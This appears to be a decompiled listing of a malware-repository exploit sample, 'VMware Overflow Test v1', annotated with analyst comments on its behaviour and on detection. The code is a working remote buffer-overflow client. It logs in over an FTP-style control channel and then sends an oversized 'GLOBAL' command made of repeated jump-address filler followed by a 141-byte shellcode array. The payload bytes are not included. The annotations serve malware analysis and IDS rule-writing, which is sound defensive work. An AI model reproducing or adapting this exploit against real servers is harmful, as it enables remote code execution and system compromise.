// Decompiled with JetBrains decompiler
// Type:
// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
//
// Analyst notes (added during review; code tokens below are unchanged decompiler output):
// - The sample is a command-line network client. The Native/Unmanaged method attributes and
//   the MSVC-mangled string-literal field names suggest a C/C++ program compiled to a
//   mixed-mode .NET image -- presumably C++/CLI; confirm against the PE headers.
// - The 64-hex-digit value in the file name looks like a SHA-256 of the sample (confirm by
//   hashing the file); it is the identifier to pivot on in threat-intel lookups.
// - Behaviour visible in main(): TCP connect to argv-supplied host/port, an FTP-style
//   USER/PASS login, then one "GLOBAL " command whose argument is a repeated 8-byte pattern
//   followed by 141 bytes from the `shellcode` array. The banner literal names it
//   "VMware Overflow Test v1".
// - Detection angle: the third request is a single command line of several hundred bytes
//   with non-printable content and a fixed 8-byte repetition right after login. A parser or
//   IDS rule that bounds command-argument length on the control channel will flag or drop it.
// - The listing does not compile as C#: the "ISSUE" comments mark IL constructs
//   (initblk/cpblk, raw reference casts) that the decompiler could not express.
using System;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Security;

internal class \u003CModule\u003E
{
  // String-literal storage. Each field name is an MSVC-mangled symbol that embeds (up to the
  // first 32 characters of) the literal text; the opaque $ArrayType$0x... types are
  // fixed-size byte arrays whose sizes are not shown in this listing.
  // Separator line printed above and below the usage banner.
  public static \u0024ArrayType\u00240x5efdd7df \u003F\u003F_C\u0040_0EB\u0040NAMDAADC\u0040\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u0040;
  // Tool banner ("VMware Overflow Test v1..."; the mangled name truncates the rest).
  public static \u0024ArrayType\u00240xf1cc4cbd \u003F\u003F_C\u0040_0DB\u0040ICPJLJMF\u0040VMware\u003F5Overflow\u003F5Test\u003F5v1\u003F40\u003F5Writte\u0040;
  // Credit line printed by usage().
  public static \u0024ArrayType\u00240x0e6cb2b2 \u003F\u003F_C\u0040_0CB\u0040FOEJOKAI\u0040Fixed\u003F5by\u003F5agathos\u003F5\u003F\u0024DMeth0\u003F\u0024EAlist\u003F4ru\u003F\u0024DO\u003F6\u0040;
  // Usage text ("Usage: vmware.exe <IP> <PORT> <u..."; truncated in the mangled name).
  public static \u0024ArrayType\u00240x3a9112db \u003F\u003F_C\u0040_0DN\u0040JGNDLFBF\u0040Usage\u003F3\u003F5vmware\u003F4exe\u003F5\u003F\u0024DMIP\u003F\u0024DO\u003F5\u003F\u0024DMPORT\u003F\u0024DO\u003F5\u003F\u0024DMu\u0040;
  // "connect error" message.
  public static \u0024ArrayType\u00240x5bb2c15a \u003F\u003F_C\u0040_0P\u0040JJDDLOF\u0040connect\u003F5error\u003F6\u003F\u0024AA\u0040;
  // "%s" format string used to echo server replies.
  public static \u0024ArrayType\u00240x1d30cc0a \u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040;
  // "USER " command prefix.
  public static \u0024ArrayType\u00240x6047384f \u003F\u003F_C\u0040_05DLLLAEHA\u0040USER\u003F5\u003F\u0024AA\u0040;
  // Line terminator appended to every command (presumably CR LF -- decoded from the mangled name).
  public static \u0024ArrayType\u00240x1d30cc0a \u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040;
  // "PASS " command prefix.
  public static \u0024ArrayType\u00240x6047384f \u003F\u003F_C\u0040_05FOGDDFF\u0040PASS\u003F5\u003F\u0024AA\u0040;
  // "GLOBAL " command prefix; this is the command that carries the oversized argument.
  public static \u0024ArrayType\u00240xfec415c1 \u003F\u003F_C\u0040_07CJLPCIKB\u0040GLOBAL\u003F5\u003F\u0024AA\u0040;
  // 4-byte literal copied into the first half of each 8-byte filler unit in main().
  public static \u0024ArrayType\u00240x4b6a6b8c \u003F\u003F_C\u0040_04JKBAFAPB\u0040\u003F\u0024JA\u003F\u0024JAXh\u003F\u0024AA\u0040;
  // "Done!" message.
  public static \u0024ArrayType\u00240x795c090e \u003F\u003F_C\u0040_06MCOPMGCE\u0040Done\u003F\u0024CB\u003F6\u003F\u0024AA\u0040;
  // Declared but not referenced anywhere in this listing.
  public static \u0024ArrayType\u00240x8b5292b5 Jmp_ESP_XP_Eng;
  // Payload bytes; the initialiser is not part of the decompiled output. main() copies 141
  // bytes from it and patches offsets 133..136 first.
  public static \u0024ArrayType\u00240x24ec09a1 shellcode;
  // 4-byte value copied into the second half of each 8-byte filler unit in main().
  public static \u0024ArrayType\u00240x8b5292b5 Jmp_ESP;

  /// <summary>
  /// Prints the banner: separator, tool name, credit line, usage text, separator.
  /// Takes no arguments and returns nothing; called by main() when argc is not 6.
  /// </summary>
  public static unsafe void usage()
  {
    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0EB\u0040NAMDAADC\u0040\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u0040, __arglist ());
    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0DB\u0040ICPJLJMF\u0040VMware\u003F5Overflow\u003F5Test\u003F5v1\u003F40\u003F5Writte\u0040, __arglist ());
    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0CB\u0040FOEJOKAI\u0040Fixed\u003F5by\u003F5agathos\u003F5\u003F\u0024DMeth0\u003F\u0024EAlist\u003F4ru\u003F\u0024DO\u003F6\u0040, __arglist ());
    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0DN\u0040JGNDLFBF\u0040Usage\u003F3\u003F5vmware\u003F4exe\u003F5\u003F\u0024DMIP\u003F\u0024DO\u003F5\u003F\u0024DMPORT\u003F\u0024DO\u003F5\u003F\u0024DMu\u0040, __arglist ());
    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0EB\u0040NAMDAADC\u0040\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u0040, __arglist ());
  }

  /// <summary>
  /// Entry point. Expects exactly five arguments (argc == 6). The argv slots are read at raw
  /// byte offsets 4, 8, 12, 16 and 20, i.e. argv[1]..argv[5] assuming 4-byte pointers
  /// (32-bit build -- confirm): host address, port, user name, password, and an integer selector.
  /// Returns 0 after printing usage, -1 when connect() fails, and 1 after the final send.
  /// </summary>
  public static unsafe int main(int argc, sbyte** argv)
  {
    if (argc != 6)
    {
      \u003CModule\u003E.usage();
      return 0;
    }
    WSAData wsaData;
    // 514 == 0x0202: requests Winsock 2.2. The return value is not checked.
    \u003CModule\u003E.WSAStartup((ushort) 514, &wsaData);
    // 2 / 1 / 6 are AF_INET / SOCK_STREAM / IPPROTO_TCP; a failed socket() is not checked here.
    uint num1 = \u003CModule\u003E.socket(2, 1, 6);
    sockaddr_in sockaddrIn;
    // The three stores below fill sockaddr_in by raw offset: +0 family (2), +2 port, +4 address.
    // ISSUE: cast to a reference type
    // ISSUE: explicit reference operation
    ^(short&) ref sockaddrIn = (short) 2;
    // ISSUE: cast to a reference type
    // ISSUE: explicit reference operation
    ^(short&) ((IntPtr) &sockaddrIn + 2) = (short) \u003CModule\u003E.htons((ushort) \u003CModule\u003E.atoi((sbyte*) *(int*) ((IntPtr) argv + 8)));
    // ISSUE: cast to a reference type
    // ISSUE: explicit reference operation
    ^(int&) ((IntPtr) &sockaddrIn + 4) = (int) \u003CModule\u003E.inet_addr((sbyte*) *(int*) ((IntPtr) argv + 4));
    // Selector argument: both branches store the same four byte values at shellcode offsets
    // 133..136, so in this decompiled build the selector does not alter the payload.
    if (\u003CModule\u003E.atoi((sbyte*) *(int*) ((IntPtr) argv + 20)) != 0)
    {
      // ISSUE: cast to a reference type
      // ISSUE: explicit reference operation
      ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 133) = (sbyte) -58;
      // ISSUE: cast to a reference type
      // ISSUE: explicit reference operation
      ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 134) = (sbyte) -124;
      // ISSUE: cast to a reference type
      // ISSUE: explicit reference operation
      ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 135) = (sbyte) -26;
      // ISSUE: cast to a reference type
      // ISSUE: explicit reference operation
      ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 136) = (sbyte) 119;
    }
    else
    {
      // ISSUE: cast to a reference type
      // ISSUE: explicit reference operation
      ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 133) = (sbyte) -58;
      // ISSUE: cast to a reference type
      // ISSUE: explicit reference operation
      ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 134) = (sbyte) -124;
      // ISSUE: cast to a reference type
      // ISSUE: explicit reference operation
      ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 135) = (sbyte) -26;
      // ISSUE: cast to a reference type
      // ISSUE: explicit reference operation
      ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 136) = (sbyte) 119;
    }
    // 16 is the sockaddr length passed to connect(); -1 is treated as failure.
    if (\u003CModule\u003E.connect(num1, (sockaddr*) &sockaddrIn, 16) == -1)
    {
      \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0P\u0040JJDDLOF\u0040connect\u003F5error\u003F6\u003F\u0024AA\u0040, __arglist ());
      return -1;
    }
    // One 4096-byte scratch buffer is reused for every reply and request; it is zeroed
    // before each use, which also keeps the 100-byte reads NUL-terminated for printf.
    \u0024ArrayType\u00240x8011bcc8 arrayType0x8011bcc8;
    // ISSUE: initblk instruction
    __memset(ref arrayType0x8011bcc8, 0, 4096);
    // Read and echo the server greeting (at most 100 bytes; recv's return value is ignored).
    \u003CModule\u003E.recv(num1, (sbyte*) &arrayType0x8011bcc8, 100, 0);
    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040, __arglist (out arrayType0x8011bcc8));
    // Request 1: "USER " + user-name argument + line terminator.
    // NOTE(review): strcat of a command-line argument into the buffer is unbounded.
    // ISSUE: initblk instruction
    __memset(ref arrayType0x8011bcc8, 0, 4096);
    // ISSUE: cpblk instruction
    __memcpy(ref arrayType0x8011bcc8, ref \u003CModule\u003E.\u003F\u003F_C\u0040_05DLLLAEHA\u0040USER\u003F5\u003F\u0024AA\u0040, 6);
    \u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) *(int*) ((IntPtr) argv + 12));
    \u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040);
    uint num2 = \u003CModule\u003E.strlen((sbyte*) &arrayType0x8011bcc8);
    \u003CModule\u003E.send(num1, (sbyte*) &arrayType0x8011bcc8, (int) num2, 0);
    // ISSUE: initblk instruction
    __memset(ref arrayType0x8011bcc8, 0, 4096);
    \u003CModule\u003E.recv(num1, (sbyte*) &arrayType0x8011bcc8, 100, 0);
    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040, __arglist (out arrayType0x8011bcc8));
    // Request 2: "PASS " + password argument + line terminator (same pattern as USER).
    // ISSUE: initblk instruction
    __memset(ref arrayType0x8011bcc8, 0, 4096);
    // ISSUE: cpblk instruction
    __memcpy(ref arrayType0x8011bcc8, ref \u003CModule\u003E.\u003F\u003F_C\u0040_05FOGDDFF\u0040PASS\u003F5\u003F\u0024AA\u0040, 6);
    \u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) *(int*) ((IntPtr) argv + 16));
    \u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040);
    uint num3 = \u003CModule\u003E.strlen((sbyte*) &arrayType0x8011bcc8);
    \u003CModule\u003E.send(num1, (sbyte*) &arrayType0x8011bcc8, (int) num3, 0);
    // ISSUE: initblk instruction
    __memset(ref arrayType0x8011bcc8, 0, 4096);
    \u003CModule\u003E.recv(num1, (sbyte*) &arrayType0x8011bcc8, 100, 0);
    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040, __arglist (out arrayType0x8011bcc8));
    // Request 3: the oversized "GLOBAL " command. Layout written into the buffer:
    //   offset 0        "GLOBAL " (8 bytes copied, including the terminator)
    //   offsets 7..294  36 units of 8 bytes: the 4-byte literal, then the 4 bytes of Jmp_ESP
    //   offset 295      141 bytes copied from `shellcode`
    // The first unit starts at offset 7 (num4 - 4), overwriting the prefix's terminator.
    // A server that bounds command-argument length before copying would reject this line.
    // ISSUE: initblk instruction
    __memset(ref arrayType0x8011bcc8, 0, 4096);
    // ISSUE: cpblk instruction
    __memcpy(ref arrayType0x8011bcc8, ref \u003CModule\u003E.\u003F\u003F_C\u0040_07CJLPCIKB\u0040GLOBAL\u003F5\u003F\u0024AA\u0040, 8);
    int num4 = (int) ((IntPtr) &arrayType0x8011bcc8 + 11);
    uint num5 = 36;
    do
    {
      // ISSUE: cpblk instruction
      __memcpy(num4 - 4, ref \u003CModule\u003E.\u003F\u003F_C\u0040_04JKBAFAPB\u0040\u003F\u0024JA\u003F\u0024JAXh\u003F\u0024AA\u0040, 4);
      // ISSUE: cpblk instruction
      __memcpy(num4, ref \u003CModule\u003E.Jmp_ESP, 4);
      num4 += 8;
      --num5;
    }
    while (num5 > 0U);
    // ISSUE: cast to a reference type
    // ISSUE: cpblk instruction
    __memcpy((\u0024ArrayType\u00240x8011bcc8&) ((IntPtr) &arrayType0x8011bcc8 + 295), ref \u003CModule\u003E.shellcode, 141);
    // The terminator is appended and the length measured with C string functions, so the
    // transmitted line ends at the first zero byte in the buffer.
    \u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040);
    uint num6 = \u003CModule\u003E.strlen((sbyte*) &arrayType0x8011bcc8);
    \u003CModule\u003E.send(num1, (sbyte*) &arrayType0x8011bcc8, (int) num6, 0);
    // No reply is read after the final send; the tool prints "Done!" and tears down.
    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_06MCOPMGCE\u0040Done\u003F\u0024CB\u003F6\u003F\u0024AA\u0040, __arglist ());
    \u003CModule\u003E.closesocket(num1);
    \u003CModule\u003E.WSACleanup();
    return 1;
  }

  // Native imports. The names match C runtime functions (printf, strlen, strcat, atoi) and
  // Winsock functions (WSAStartup, socket, htons, inet_addr, connect, send, recv,
  // closesocket, WSACleanup); parameter names obj0..objN are decompiler placeholders.
  // [SuppressUnmanagedCodeSecurity] turns off the runtime's unmanaged-code permission
  // stack walk for these calls.
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe int printf([In] sbyte* obj0, __arglist);

  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern int WSACleanup();

  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern int closesocket([In] uint obj0);

  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe int send([In] uint obj0, [In] sbyte* obj1, [In] int obj2, [In] int obj3);

  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe uint strlen([In] sbyte* obj0);

  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe sbyte* strcat([In] sbyte* obj0, [In] sbyte* obj1);

  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe int recv([In] uint obj0, [In] sbyte* obj1, [In] int obj2, [In] int obj3);

  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe int connect([In] uint obj0, [In] sockaddr* obj1, [In] int obj2);

  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe uint inet_addr([In] sbyte* obj0);

  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe int atoi([In] sbyte* obj0);

  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern ushort htons([In] ushort obj0);

  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern uint socket([In] int obj0, [In] int obj1, [In] int obj2);

  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe int WSAStartup([In] ushort obj0, [In] WSAData* obj1);

  // Native C runtime startup stub emitted into the image; not called from the code shown here.
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern uint _mainCRTStartup();
}